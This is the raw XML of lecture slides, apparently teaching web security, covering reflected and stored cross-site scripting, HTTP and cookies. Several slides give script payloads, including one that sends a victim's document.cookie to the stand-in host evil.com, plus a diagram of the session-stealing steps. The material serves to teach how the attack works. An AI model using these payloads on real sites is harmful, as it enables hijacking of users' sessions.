            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.websearch.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“http://img.com/nyan.jpg”/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="3893976"/>
            <a:ext cx="8870302" cy="27245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ectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1573763" y="3906415"/>
            <a:ext cx="8857862" cy="6407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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526972" y="4027713"/>
            <a:ext cx="3396342" cy="3981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23314" y="4027713"/>
            <a:ext cx="435429" cy="398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10613" y="4881178"/>
            <a:ext cx="1583447" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Results for:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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0130" b="11799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3294060" y="4855809"/>
            <a:ext cx="2095500" cy="1635967"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1374593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Reflected XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="847531" y="1716057"/>
            <a:ext cx="10506269" cy="975876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.websearch.com/search?q=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>="http://evil.com/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);&lt;/script&gt;</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2286" y="4650111"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840298" y="5779222"/>
            <a:ext cx="3169202" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Origin: www.websearch.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>session=xI4f-Qs02fd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709019" y="6176529"/>
            <a:ext cx="1056507" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>evil.com</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550" y="3094062"/>
            <a:ext cx="893446" cy="893446"/>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550" y="5269304"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8327312" y="4034121"/>
            <a:ext cx="1819922" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>websearch.com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4585" y="5069440"/>
            <a:ext cx="641882" cy="64188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036" y="3076421"/>
            <a:ext cx="1245186" cy="1245186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3891215" y="5190325"/>
            <a:ext cx="4761373" cy="520997"/>
            <a:chOff x="3891215" y="5190325"/>
            <a:chExt cx="4761373" cy="520997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3891215" y="5505062"/>
              <a:ext cx="4761373" cy="2062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5159">
              <a:off x="5316028" y="5190325"/>
              <a:ext cx="2202847" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>4) GET /?session=…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1710222" y="3052867"/>
            <a:ext cx="2719709" cy="1597244"/>
            <a:chOff x="1710222" y="3052867"/>
            <a:chExt cx="2719709" cy="1597244"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Curved Connector 18"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="18" idx="3"/>
              <a:endCxn id="11" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1710222" y="3699014"/>
              <a:ext cx="1714678" cy="951097"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2">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122598" y="3052867"/>
              <a:ext cx="2307333" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>1) Send malicious link to the victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3818615" y="3509684"/>
            <a:ext cx="4578936" cy="1182798"/>
            <a:chOff x="3818615" y="3509684"/>
            <a:chExt cx="4578936" cy="1182798"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3818615" y="3509684"/>
              <a:ext cx="4578936" cy="11827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20724147">
              <a:off x="4431969" y="3737297"/>
              <a:ext cx="2996205" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>2) GET </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                <a:t>search?q</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>=&lt;script&gt;…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3927513" y="3987508"/>
            <a:ext cx="4488699" cy="1165217"/>
            <a:chOff x="3927513" y="3987508"/>
            <a:chExt cx="4488699" cy="1165217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3927513" y="3987508"/>
              <a:ext cx="4488699" cy="11652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20724147">
              <a:off x="4950758" y="4215746"/>
              <a:ext cx="2215286" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>3) HTTP/1.1 200 OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4073272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right)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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Website, Type 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="730963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose we have a social network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.friendly.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="2898710"/>
            <a:ext cx="8870302" cy="3719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ectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579983" y="2911150"/>
            <a:ext cx="8857862" cy="6407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   friendly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253274" y="3032448"/>
            <a:ext cx="3396342" cy="3981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36980" y="3772676"/>
            <a:ext cx="2017284" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>What’s going on?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805404" y="4172786"/>
            <a:ext cx="6363478" cy="152510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dirty="0"/>
              <a:t>I hope you like pop-tarts ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.body.style.backgroundImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(' http://img.com/nyan.jpg ')"&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7520474" y="5816081"/>
            <a:ext cx="1648408" cy="44787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Update Status</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="795891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Website, Type 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="730963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose we have a social network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.friendly.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="2898710"/>
            <a:ext cx="8870302" cy="3719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10130" b="11799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="3551852"/>
            <a:ext cx="8870302" cy="3066662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579983" y="2911150"/>
            <a:ext cx="8857862" cy="6407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   friendly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253274" y="3032448"/>
            <a:ext cx="3396342" cy="3981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36980" y="3772676"/>
            <a:ext cx="2480615" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Latest Status Updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3533191" y="4282526"/>
            <a:ext cx="5567266" cy="74178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dirty="0"/>
              <a:t>I hope you like pop-tarts ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Monday, March 23, 2015</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6980" y="4282526"/>
            <a:ext cx="741784" cy="741784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145441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Hypertext Transfer Protocol (HTTP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>HTTP 0.9/1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>HTTP 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27749075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Stored XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548605" y="1655431"/>
            <a:ext cx="9019591" cy="975876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>="http://evil.com/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
